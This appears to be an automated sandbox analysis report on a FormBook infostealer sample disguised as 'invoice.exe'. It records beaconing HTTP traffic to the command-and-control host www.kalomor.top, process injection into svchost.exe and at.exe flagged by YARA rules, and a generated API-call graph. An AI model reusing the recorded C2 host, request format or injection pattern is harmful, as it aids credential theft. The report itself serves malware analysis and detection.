                      Data Raw: 4d 74 58 48 38 64 52 48 3d 73 74 41 76 66 30 46 54 56 6b 63 6f 73 42 70 59 69 53 32 53 68 43 61 68 53 48 49 58 66 79 71 6d 78 72 76 4a 4d 51 61 63 75 54 69 42 73 52 38 38 32 55 32 43 52 65 4a 30 34 65 65 2b 70 76 65 45 44 4a 72 73 76 65 42 6a 66 31 49 65 4b 31 35 57 43 51 78 48 44 33 72 44 79 63 77 34 72 4b 73 68 37 76 4e 78 74 6f 42 6b 5a 56 55 4c 6e 30 4f 34 30 36 4d 6d 39 37 35 67 53 70 67 6c 78 74 50 47 69 59 67 74 33 73 6b 45 56 4e 59 2b 63 48 55 75 30 55 48 5a 33 50 2f 74 73 4c 35 46 35 71 4b 47 57 47 58 62 6e 69 34 56 4e 72 62 66 79 67 62 2b 76 2b 65 69 51 6c 63 4b 4f 7a 75 49 61 34 57 68 66 53 63 73 48 6a 72 4b 55 54 36 73 75 52 69 7a 79 61 76 76 57 76 55 3d
                      Data Ascii: MtXH8dRH=stAvf0FTVkcosBpYiS2ShCahSHIXfyqmxrvJMQacuTiBsR882U2CReJ04ee+pveEDJrsveBjf1IeK15WCQxHD3rDycw4rKsh7vNxtoBkZVULn0O406Mm975gSpglxtPGiYgt3skEVNY+cHUu0UHZ3P/tsL5F5qKGWGXbni4VNrbfygb+v+eiQlcKOzuIa4WhfScsHjrKUT6suRizyavvWvU=
                      Sep 13, 2024 12:29:32.306646109 CEST309INHTTP/1.1 405 Not Allowed
                      Server: nginx/1.26.2
                      Date: Fri, 13 Sep 2024 10:29:32 GMT
                      Content-Type: text/html
                      Content-Length: 157
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      31192.168.2.45043291.215.85.23803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:29:34.260888100 CEST6180OUTPOST /1i25/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.kalomor.top
                      Origin: http://www.kalomor.top
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.kalomor.top/1i25/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 73 74 41 76 66 30 46 54 56 6b 63 6f 73 42 70 59 69 53 32 53 68 43 61 68 53 48 49 58 66 79 71 6d 78 72 76 4a 4d 51 61 63 75 54 71 42 76 6a 6b 38 30 7a 71 43 51 65 4a 30 6e 75 65 2f 70 76 66 63 44 4a 7a 6f 76 65 63 59 66 7a 4d 65 4b 58 42 57 54 53 5a 48 4b 33 72 44 74 4d 77 31 76 4b 73 30 37 76 63 34 74 6f 52 6b 5a 56 55 4c 6e 79 69 34 79 76 67 6d 36 4c 35 68 54 70 67 35 67 39 50 69 69 5a 4a 53 33 74 6c 35 56 39 34 2b 63 6e 45 75 37 47 76 5a 74 50 2f 76 34 72 34 59 35 71 47 4a 57 46 69 67 6e 69 4e 43 4e 74 6e 66 2b 58 79 66 38 2f 65 6f 4b 47 78 59 61 51 4f 55 64 2f 44 69 65 67 56 59 4b 53 33 51 43 52 7a 4f 67 79 44 49 6b 65 54 70 4b 36 42 64 57 79 6c 6d 79 6d 55 70 67 62 64 50 34 57 6c 53 71 46 4c 2f 65 59 71 56 6f 4b 72 6b 48 33 59 47 50 72 77 4c 4f 78 79 6a 69 72 55 66 54 4c 32 7a 71 72 76 54 2f 45 77 7a 32 69 46 45 55 65 43 76 4b 4a 59 43 6d 31 74 30 66 57 79 54 51 6f 67 43 41 35 72 4f 75 34 38 77 6c 73 79 46 4f 49 52 39 4e 2f 50 36 57 54 72 76 6f 79 34 67 59 50 43 58 6c [TRUNCATED]
                      Data Ascii: MtXH8dRH=stAvf0FTVkcosBpYiS2ShCahSHIXfyqmxrvJMQacuTqBvjk80zqCQeJ0nue/pvfcDJzovecYfzMeKXBWTSZHK3rDtMw1vKs07vc4toRkZVULnyi4yvgm6L5hTpg5g9PiiZJS3tl5V94+cnEu7GvZtP/v4r4Y5qGJWFigniNCNtnf+Xyf8/eoKGxYaQOUd/DiegVYKS3QCRzOgyDIkeTpK6BdWylmymUpgbdP4WlSqFL/eYqVoKrkH3YGPrwLOxyjirUfTL2zqrvT/Ewz2iFEUeCvKJYCm1t0fWyTQogCA5rOu48wlsyFOIR9N/P6WTrvoy4gYPCXllR0tlHv6b2IvfuFlz02okaYUT3hddy8kDU+D91SADZy3wY9sSe7BdNEZT11y4MArAbibflc61yLhtbHwnVwAnbWoLOS93lKzwoGW/CC/YNtx/WJsJkL/7COvzgWWNOEPBQ9VQBaGFR4D1DWUtnzEewOKXsvtgdkTb5+n762yCgjzCUXlXItbnzNp6BGtlQJR1EC7fe1PUpVxvNzv2F/kxCZGIDMY+sQcjdgcXGTjUtPF/4ZK4jo69u5pWlXIw47/y9nasYJj0HrP8/M+wO0FJBHkn+8UJlzmUqN2O/sJZKOSULf6OY898hpv1QCZaI9+R9x26qw1ks6DQV8Mv7M6BcTAgpV6OYLHLwscwk8ZzZodLMOkiPBuSi9Aa1kG5F1jZwQQ+81h+y+4F3OYZt/OlT1YI9UU09SfABQ8gvhHkK/LqvodOx4IxRoCaoiwqz6K75l+NH+GYIaSGbEoB/V/RIncaPqU1DmkbH13kzcYUv6zf+ktS54wZH5PBlZ7xtnxtct+xL5Kn9v+8INDrYdS0SG2uBBO8zzG8VWvWdJcRQ7FicPubVpel7YTKkWDAdp7jLqpiP1qEQ6Q43kfhIXHiqKeubrvpWOR50dhrCIWybmunayRcDW0MMrwwPjZLKHXDz1rtHFaXSEDE1dpyYwd6T3BmaT1Ct9UMb [TRUNCATED]
                      Sep 13, 2024 12:29:34.260910988 CEST4661OUTData Raw: 6f 71 2f 42 67 4f 6e 58 64 6f 79 6a 48 4a 36 56 59 75 66 77 75 6d 61 2f 53 33 33 64 69 78 69 41 42 4d 77 31 78 35 36 37 55 5a 66 66 49 4d 31 48 74 65 65 6c 68 71 77 2b 6e 76 46 52 76 37 57 72 7a 32 4c 53 73 55 4d 4f 42 2f 4c 6e 41 79 54 63 6c 50
                      Data Ascii: oq/BgOnXdoyjHJ6VYufwuma/S33dixiABMw1x567UZffIM1Hteelhqw+nvFRv7Wrz2LSsUMOB/LnAyTclPBNJtxmIV3r1NAiVToitOnNEJoNbGChMz3fGmZeXiA8fTTcASqQ7ZS4h7bCtYSiSCRpHZV58FttKWQtFhAfV62H2c5Oq7uj/Rkclwz5DPQ+o2Yj/hfnuIIGq1SPTKbXZ8uYtwDSQI4ECkADafeY4LwP1GBuAlnIf6a
                      Sep 13, 2024 12:29:34.937767982 CEST309INHTTP/1.1 405 Not Allowed
                      Server: nginx/1.26.2
                      Date: Fri, 13 Sep 2024 10:29:34 GMT
                      Content-Type: text/html
                      Content-Length: 157
                      Connection: close
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      32192.168.2.45043391.215.85.23803120C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      TimestampBytes transferredDirectionData
                      Sep 13, 2024 12:29:36.805512905 CEST481OUTGET /1i25/?MtXH8dRH=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.kalomor.top
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:29:37.516345978 CEST236INHTTP/1.1 200 OK
                      Server: nginx/1.26.2
                      Date: Fri, 13 Sep 2024 10:29:37 GMT
                      Content-Type: text/html
                      Content-Length: 11694
                      Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                      Connection: close
                      ETag: "66e176fd-2dae"
                      Accept-Ranges: bytes
                      Sep 13, 2024 12:29:37.516374111 CEST1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                      Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" co
                      Sep 13, 2024 12:29:37.516396046 CEST224INData Raw: 6e 67 3a 6e 6f 6e 65 3b 6f 76 65 72 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 6e 6f 6e 65 7d 2e 77 72 61 70 70 65 72 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69
                      Data Ascii: ng:none;overscroll-behavior:none}.wrapper{min-height:100%;display:flex;overflow:hidden}@supports (overflow:clip){.wrapper{overflow:clip}}.wrapper>main{flex:1 1 auto}.wrapper>*{min-width:0}.main{display:flex;align-items:cente
                      Sep 13, 2024 12:29:37.516410112 CEST1236INData Raw: 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 76 77 3b 70 61 64 64 69 6e 67 3a 31 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69
                      Data Ascii: r;justify-content:center;min-height:100vh;min-width:100vw;padding:1rem}.window-main{background-color:#13151a;border-radius:.75rem;max-width:45.625rem}.window-main .svg-one{position:absolute;top:-240px;right:-360px;z-index:-1}.window-main .svg-
                      Sep 13, 2024 12:29:37.516431093 CEST1236INData Raw: 64 64 69 6e 67 3a 33 2e 37 35 72 65 6d 20 38 2e 39 33 37 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 62 6f 64 79 7b 66
                      Data Ascii: dding:3.75rem 8.9375rem}.window-main__title{font-size:2.25rem}.window-main__body{font-size:1.0625rem}.window-main__info{margin-bottom:1.875rem}.window-main__list{padding-left:.6875rem}.window-main__item{padding-left:.875rem}}@media (max-width:
                      Sep 13, 2024 12:29:37.516467094 CEST1236INData Raw: 70 28 31 2e 35 72 65 6d 20 2c 2d 34 2e 33 30 34 38 37 38 30 34 38 38 72 65 6d 20 2b 20 32 39 2e 30 32 34 33 39 30 32 34 33 39 76 77 20 2c 38 2e 39 33 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 72 69 67
                      Data Ascii: p(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-right:calc(1.5rem + 7.4375*(100vw - 20rem)/ 25.625)}}@supports (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:clamp
                      Sep 13, 2024 12:29:37.516483068 CEST1236INData Raw: 38 35 33 36 36 72 65 6d 20 2b 20 2e 37 33 31 37 30 37 33 31 37 31 76 77 20 2c 31 2e 30 36 32 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 66 6f 6e 74 2d 73 69 7a 65 3a 63 6c 61 6d 70 28 30 2e 38 37 35 72 65 6d 20 2c 30 2e 37
                      Data Ascii: 85366rem + .7317073171vw ,1.0625rem)}}@supports not (font-size:clamp(0.875rem ,0.7286585366rem + 0.7317073171vw ,1.0625rem)){.window-main__body{font-size:calc(.875rem + .1875*(100vw - 20rem)/ 25.625)}}@supports (margin-bottom:clamp(1.5rem ,1.2
                      Sep 13, 2024 12:29:37.516516924 CEST1236INData Raw: 67 69 6e 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 61
                      Data Ascii: gin-top:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__actions,.window-main__body{margin-top:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-top:clamp(1.5rem ,1.2073170732rem + 1.46341
                      Sep 13, 2024 12:29:37.516534090 CEST1236INData Raw: 09 3c 2f 67 3e 0a 09 09 09 09 09 09 3c 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 38 22 20 66 69 6c 74 65 72 3d 22 75 72 6c 28 23 66 69 6c 74 65 72 32 5f 66 5f 32 30 30 31 5f 35 29 22 3e 0a 09 09 09 09 09 09 09 3c 70 61 74 68 20 64 3d 22 4d 32 36 32
                      Data Ascii: </g><g opacity="0.8" filter="url(#filter2_f_2001_5)"><path d="M262.896 422.214C308.876 327.919 217.614 345.077 244.275 289.547C270.937 234.016 322.501 203.38 359.446 221.12C396.392 238.859 404.728 298.256 378.067 353.786C351.40
                      Sep 13, 2024 12:29:37.516590118 CEST1236INData Raw: 3d 22 35 31 34 2e 33 37 38 22 20 68 65 69 67 68 74 3d 22 35 37 31 2e 31 36 32 22 20 66 69 6c 74 65 72 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65
                      Data Ascii: ="514.378" height="571.162" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="s
                      Sep 13, 2024 12:29:37.526339054 CEST1236INData Raw: 67 2d 74 77 6f 22 20 77 69 64 74 68 3d 22 37 33 31 22 20 68 65 69 67 68 74 3d 22 38 33 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 33 31 20 38 33 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77
                      Data Ascii: g-two" width="731" height="830" viewBox="0 0 731 830" fill="none" xmlns="http://www.w3.org/2000/svg"><g opacity="0.7" filter="url(#filter0_f_2001_10)"><ellipse cx="112.534" cy="134.299" rx="112.534" ry="134.299" transform="matri


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:06:26:30
                      Start date:13/09/2024
                      Path:C:\Users\user\Desktop\invoice.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\invoice.exe"
                      Imagebase:0xf80000
                      File size:1'281'536 bytes
                      MD5 hash:8387395792CFC0ABB08DC4C23B8AD700
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:1
                      Start time:06:26:31
                      Start date:13/09/2024
                      Path:C:\Windows\SysWOW64\svchost.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\invoice.exe"
                      Imagebase:0xdf0000
                      File size:46'504 bytes
                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:2
                      Start time:06:26:38
                      Start date:13/09/2024
                      Path:C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe"
                      Imagebase:0xdc0000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:3
                      Start time:06:26:41
                      Start date:13/09/2024
                      Path:C:\Windows\SysWOW64\at.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\at.exe"
                      Imagebase:0x700000
                      File size:25'088 bytes
                      MD5 hash:2AE20048111861FA09B709D3CC551AD6
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:moderate
                      Has exited:false

                      General

                      Target ID:7
                      Start time:06:26:53
                      Start date:13/09/2024
                      Path:C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe"
                      Imagebase:0xdc0000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:8
                      Start time:06:27:15
                      Start date:13/09/2024
                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Imagebase:0x7ff6bf500000
                      File size:676'768 bytes
                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:3.9%
                        Dynamic/Decrypted Code Coverage:1.3%
                        Signature Coverage:8.5%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:173
                        execution_graph 96950 152df53 96953 152dbc8 96950->96953 96952 152df9f 96966 152b5f8 96953->96966 96956 152dc98 CreateFileW 96959 152dca5 96956->96959 96963 152dc67 96956->96963 96957 152dcc1 VirtualAlloc 96958 152dce2 ReadFile 96957->96958 96957->96959 96958->96959 96962 152dd00 VirtualAlloc 96958->96962 96960 152dec2 96959->96960 96961 152deb4 VirtualFree 96959->96961 96960->96952 96961->96960 96962->96959 96962->96963 96963->96957 96963->96959 96964 152ddc8 CloseHandle 96963->96964 96965 152ddd8 VirtualFree 96963->96965 96969 152ead8 GetPEB 96963->96969 96964->96963 96965->96963 96971 152ea78 GetPEB 96966->96971 96968 152bc83 96968->96963 96970 152eb02 96969->96970 96970->96956 96972 152eaa2 96971->96972 96972->96968 96973 f8107d 96978 f871eb 96973->96978 96975 f8108c 97009 fa2ec0 96975->97009 96979 f871fb __write_nolock 96978->96979 97012 f877c7 96979->97012 96983 f872ba 97024 fa068b 96983->97024 96990 f877c7 59 API calls 96991 f872eb 96990->96991 97043 f87eec 96991->97043 96993 f872f4 RegOpenKeyExW 96994 fbec0a RegQueryValueExW 96993->96994 96998 f87316 Mailbox 96993->96998 96995 fbec9c RegCloseKey 96994->96995 96996 fbec27 96994->96996 96995->96998 97006 fbecae _wcscat Mailbox __NMSG_WRITE 96995->97006 97047 fa0f36 96996->97047 96998->96975 96999 fbec40 97057 f8538e 96999->97057 97002 f87b52 59 API calls 97002->97006 97003 fbec68 97060 f87d2c 97003->97060 97005 fbec82 97005->96995 97006->96998 97006->97002 97008 f83f84 59 API calls 97006->97008 97069 f87f41 97006->97069 97008->97006 97134 fa2dc4 97009->97134 97011 f81096 97013 fa0f36 Mailbox 59 API calls 97012->97013 97014 f877e8 97013->97014 97015 fa0f36 Mailbox 59 API calls 97014->97015 97016 f872b1 97015->97016 97017 f84864 97016->97017 97073 fb1ac0 97017->97073 97020 f87f41 59 API calls 97021 f84897 97020->97021 97075 f848ae 97021->97075 97023 f848a1 Mailbox 97023->96983 97025 fb1ac0 __write_nolock 97024->97025 97026 fa0698 GetFullPathNameW 97025->97026 97027 fa06ba 97026->97027 97028 f87d2c 59 API calls 97027->97028 97029 f872c5 97028->97029 97030 f87e0b 97029->97030 97031 f87e1f 97030->97031 97032 fbf0a3 97030->97032 97097 f87db0 97031->97097 97102 f88189 97032->97102 97035 f872d3 97037 f83f84 97035->97037 97036 fbf0ae __NMSG_WRITE _memmove 97038 f83f92 97037->97038 97042 f83fb4 _memmove 97037->97042 97040 fa0f36 Mailbox 59 API calls 97038->97040 97039 fa0f36 Mailbox 59 API calls 97041 f83fc8 97039->97041 97040->97042 97041->96990 97042->97039 97044 f87f06 97043->97044 97046 f87ef9 97043->97046 97045 fa0f36 Mailbox 59 API calls 97044->97045 97045->97046 97046->96993 97050 fa0f3e 97047->97050 97049 fa0f58 97049->96999 97050->97049 97052 fa0f5c std::exception::exception 97050->97052 97105 fa588c 97050->97105 97122 fa3521 DecodePointer 97050->97122 97123 fa871b RaiseException 97052->97123 97054 fa0f86 97124 fa8651 58 API calls _free 97054->97124 97056 fa0f98 97056->96999 97058 fa0f36 Mailbox 59 API calls 97057->97058 97059 f853a0 RegQueryValueExW 97058->97059 97059->97003 97059->97005 97061 f87d38 __NMSG_WRITE 97060->97061 97062 f87da5 97060->97062 97064 f87d4e 97061->97064 97065 f87d73 97061->97065 97063 f87e8c 59 API calls 97062->97063 97068 f87d56 _memmove 97063->97068 97133 f88087 59 API calls Mailbox 97064->97133 97066 f88189 59 API calls 97065->97066 97066->97068 97068->97005 97070 f87f50 __NMSG_WRITE _memmove 97069->97070 97071 fa0f36 Mailbox 59 API calls 97070->97071 97072 f87f8e 97071->97072 97072->97006 97074 f84871 GetModuleFileNameW 97073->97074 97074->97020 97076 fb1ac0 __write_nolock 97075->97076 97077 f848bb GetFullPathNameW 97076->97077 97078 f848da 97077->97078 97079 f848f7 97077->97079 97081 f87d2c 59 API calls 97078->97081 97080 f87eec 59 API calls 97079->97080 97082 f848e6 97080->97082 97081->97082 97085 f87886 97082->97085 97086 f87894 97085->97086 97089 f87e8c 97086->97089 97088 f848f2 97088->97023 97090 f87e9a 97089->97090 97092 f87ea3 _memmove 97089->97092 97090->97092 97093 f87faf 97090->97093 97092->97088 97094 f87fbf _memmove 97093->97094 97095 f87fc2 97093->97095 97094->97092 97096 fa0f36 Mailbox 59 API calls 97095->97096 97096->97094 97098 f87dbf __NMSG_WRITE 97097->97098 97099 f88189 59 API calls 97098->97099 97100 f87dd0 _memmove 97098->97100 97101 fbf060 _memmove 97099->97101 97100->97035 97103 fa0f36 Mailbox 59 API calls 97102->97103 97104 f88193 97103->97104 97104->97036 97106 fa5907 97105->97106 97115 fa5898 97105->97115 97131 fa3521 DecodePointer 97106->97131 97108 fa590d 97132 fa8ca8 58 API calls __getptd_noexit 97108->97132 97111 fa58cb RtlAllocateHeap 97112 fa58ff 97111->97112 97111->97115 97112->97050 97114 fa58f3 97129 fa8ca8 58 API calls __getptd_noexit 97114->97129 97115->97111 97115->97114 97116 fa58a3 97115->97116 97120 fa58f1 97115->97120 97128 fa3521 DecodePointer 97115->97128 97116->97115 97125 faa2eb 58 API calls __NMSG_WRITE 97116->97125 97126 faa348 58 API calls 5 library calls 97116->97126 97127 fa321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97116->97127 97130 fa8ca8 58 API calls __getptd_noexit 97120->97130 97122->97050 97123->97054 97124->97056 97125->97116 97126->97116 97128->97115 97129->97120 97130->97112 97131->97108 97132->97112 97133->97068 97135 fa2dd0 _flsall 97134->97135 97142 fa3397 97135->97142 97141 fa2df7 _flsall 97141->97011 97159 fa9d8b 97142->97159 97144 fa2dd9 